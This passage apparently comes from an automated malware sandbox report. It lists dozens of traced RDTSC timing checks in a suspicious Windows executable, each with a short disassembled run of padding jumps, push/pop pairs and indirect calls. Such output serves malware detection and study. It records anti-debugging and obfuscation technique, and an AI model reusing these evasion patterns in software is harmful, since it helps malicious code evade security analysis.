edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A371DF second address: A371E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A371E3 second address: A371F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A331B2 second address: A33256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007FB418E0AE7Fh 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FB418E0AE78h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 push dword ptr fs:[00000000h] 0x0000002c jmp 00007FB418E0AE84h 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 adc di, 1471h 0x0000003d mov eax, dword ptr [ebp+122D0D65h] 0x00000043 mov dword ptr [ebp+124619DBh], eax 0x00000049 or bx, 12EDh 0x0000004e push FFFFFFFFh 0x00000050 push 00000000h 0x00000052 push edi 0x00000053 call 00007FB418E0AE78h 0x00000058 pop edi 0x00000059 mov dword ptr [esp+04h], edi 0x0000005d add dword ptr [esp+04h], 0000001Ch 0x00000065 inc edi 0x00000066 push edi 0x00000067 ret 0x00000068 pop edi 0x00000069 ret 0x0000006a mov ebx, esi 0x0000006c nop 0x0000006d je 00007FB418E0AE80h 0x00000073 push eax 0x00000074 push edx 0x00000075 pushad 0x00000076 popad 0x00000077 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A33256 second address: A33263 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A33263 second address: A33272 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3423B second address: A34241 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A34241 second address: A3424B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FB418E0AE76h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A38FE2 second address: A38FF9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB418AEFE48h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007FB418AEFE46h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A38FF9 second address: A38FFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A34326 second address: A34330 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB418AEFE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A34330 second address: A34337 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3B085 second address: A3B089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3C098 second address: A3C09E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3C09E second address: A3C0A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3C0A3 second address: A3C0BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3C0BE second address: A3C0C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3C0C2 second address: A3C0C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3C0C8 second address: A3C159 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FB418AEFE48h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 mov bx, ax 0x00000027 push 00000000h 0x00000029 jmp 00007FB418AEFE4Dh 0x0000002e push 00000000h 0x00000030 jng 00007FB418AEFE49h 0x00000036 movsx ebx, si 0x00000039 xchg eax, esi 0x0000003a jnl 00007FB418AEFE5Bh 0x00000040 push eax 0x00000041 pushad 0x00000042 push edx 0x00000043 jmp 00007FB418AEFE57h 0x00000048 pop edx 0x00000049 pushad 0x0000004a jng 00007FB418AEFE46h 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3D19C second address: A3D1B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3B22F second address: A3B239 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3B239 second address: A3B23D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3E2E7 second address: A3E2F9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB418AEFE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007FB418AEFE46h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3D420 second address: A3D428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3D4C5 second address: A3D4DB instructions: 0x00000000 rdtsc 0x00000002 js 00007FB418AEFE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f ja 00007FB418AEFE46h 0x00000015 pop edi 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3F4A0 second address: A3F4A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3F5E9 second address: A3F5F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3F5F5 second address: A3F5FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A417CB second address: A417DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB418AEFE4Eh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A4A6D2 second address: A4A6E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FB418E0AE76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A4A6E2 second address: A4A6E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A4A870 second address: A4A89A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FB418E0AE7Dh 0x0000000f jmp 00007FB418E0AE7Bh 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A4AB06 second address: A4AB29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE59h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A4AB29 second address: A4AB51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB418E0AE7Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnp 00007FB418E0AE76h 0x00000012 jnc 00007FB418E0AE76h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d push edx 0x0000001e pop edx 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A4AB51 second address: A4AB57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A4F13F second address: A4F15A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE7Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A4F15A second address: A4F164 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB418AEFE61h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A4F164 second address: A4F19A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418E0AE85h 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB418E0AE89h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A52C48 second address: A52C7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB418AEFE52h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007FB418AEFE57h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A52D65 second address: A52D6F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB418E0AE7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A52F54 second address: A52F59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A52F59 second address: A52F5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A52F5F second address: 8849E4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 3AE9F196h 0x0000000f stc 0x00000010 push dword ptr [ebp+122D0DD1h] 0x00000016 jmp 00007FB418AEFE59h 0x0000001b call dword ptr [ebp+122D3904h] 0x00000021 pushad 0x00000022 cmc 0x00000023 xor eax, eax 0x00000025 pushad 0x00000026 jmp 00007FB418AEFE4Ch 0x0000002b mov ebx, 02FD5347h 0x00000030 popad 0x00000031 mov dword ptr [ebp+122D1E3Dh], eax 0x00000037 mov edx, dword ptr [esp+28h] 0x0000003b jmp 00007FB418AEFE52h 0x00000040 mov dword ptr [ebp+122D29A2h], eax 0x00000046 clc 0x00000047 mov esi, 0000003Ch 0x0000004c xor dword ptr [ebp+122D1E3Dh], edx 0x00000052 add esi, dword ptr [esp+24h] 0x00000056 sub dword ptr [ebp+122D18DFh], ebx 0x0000005c lodsw 0x0000005e sub dword ptr [ebp+122D18DFh], edi 0x00000064 add eax, dword ptr [esp+24h] 0x00000068 ja 00007FB418AEFE5Dh 0x0000006e mov ebx, dword ptr [esp+24h] 0x00000072 mov dword ptr [ebp+122D1E3Dh], ecx 0x00000078 nop 0x00000079 pushad 0x0000007a push eax 0x0000007b push edx 0x0000007c pushad 0x0000007d popad 0x0000007e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A58514 second address: A58547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ecx 0x00000007 jmp 00007FB418E0AE81h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB418E0AE89h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A58547 second address: A5854B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A57854 second address: A5785E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A5785E second address: A57867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A57867 second address: A57871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FB418E0AE76h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A57C82 second address: A57C96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418AEFE50h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A5806B second address: A58086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418E0AE87h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A5839E second address: A583A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A5F38D second address: A5F398 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A5DDB6 second address: A5DDBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A5DDBA second address: A5DDC3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A5DDC3 second address: A5DDEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB418AEFE46h 0x0000000a jno 00007FB418AEFE46h 0x00000010 popad 0x00000011 pushad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jmp 00007FB418AEFE53h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A5E7E7 second address: A5E7EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A5E7EB second address: A5E806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FB418AEFE4Eh 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A5E806 second address: A5E80A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A5ED93 second address: A5EDAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB418AEFE58h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A11008 second address: A1100E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A1100E second address: A1101E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FB418AEFE46h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A1101E second address: A1104A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB418E0AE76h 0x00000008 je 00007FB418E0AE76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB418E0AE88h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A1104A second address: A1104E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A1104E second address: A11062 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a popad 0x0000000b push edx 0x0000000c js 00007FB418E0AE7Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A5F1FE second address: A5F202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A62780 second address: A6279E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418E0AE84h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A6279E second address: A627AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A627AC second address: A627BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A627BD second address: A627C7 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB418AEFE4Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A627C7 second address: A627D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A275D7 second address: A27681 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FB418AEFE48h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D1916h], ebx 0x0000002c mov edx, dword ptr [ebp+122D29E2h] 0x00000032 call 00007FB418AEFE59h 0x00000037 jmp 00007FB418AEFE56h 0x0000003c pop edi 0x0000003d lea eax, dword ptr [ebp+124763CDh] 0x00000043 sub dword ptr [ebp+12449765h], ecx 0x00000049 nop 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d jmp 00007FB418AEFE59h 0x00000052 jno 00007FB418AEFE46h 0x00000058 popad 0x00000059 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A27681 second address: A10466 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB418E0AE8Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c jg 00007FB418E0AE7Ch 0x00000012 pop esi 0x00000013 nop 0x00000014 mov dword ptr [ebp+122D192Dh], ebx 0x0000001a call dword ptr [ebp+122D3542h] 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jo 00007FB418E0AE76h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A2771C second address: A2773E instructions: 0x00000000 rdtsc 0x00000002 je 00007FB418AEFE50h 0x00000008 jmp 00007FB418AEFE4Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 push ecx 0x00000012 jp 00007FB418AEFE46h 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A27C10 second address: A27C14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A27C14 second address: A27C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A27D5E second address: A27D70 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB418E0AE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop edi 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A28076 second address: A2807C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A28435 second address: A28439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A28779 second address: A2877D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
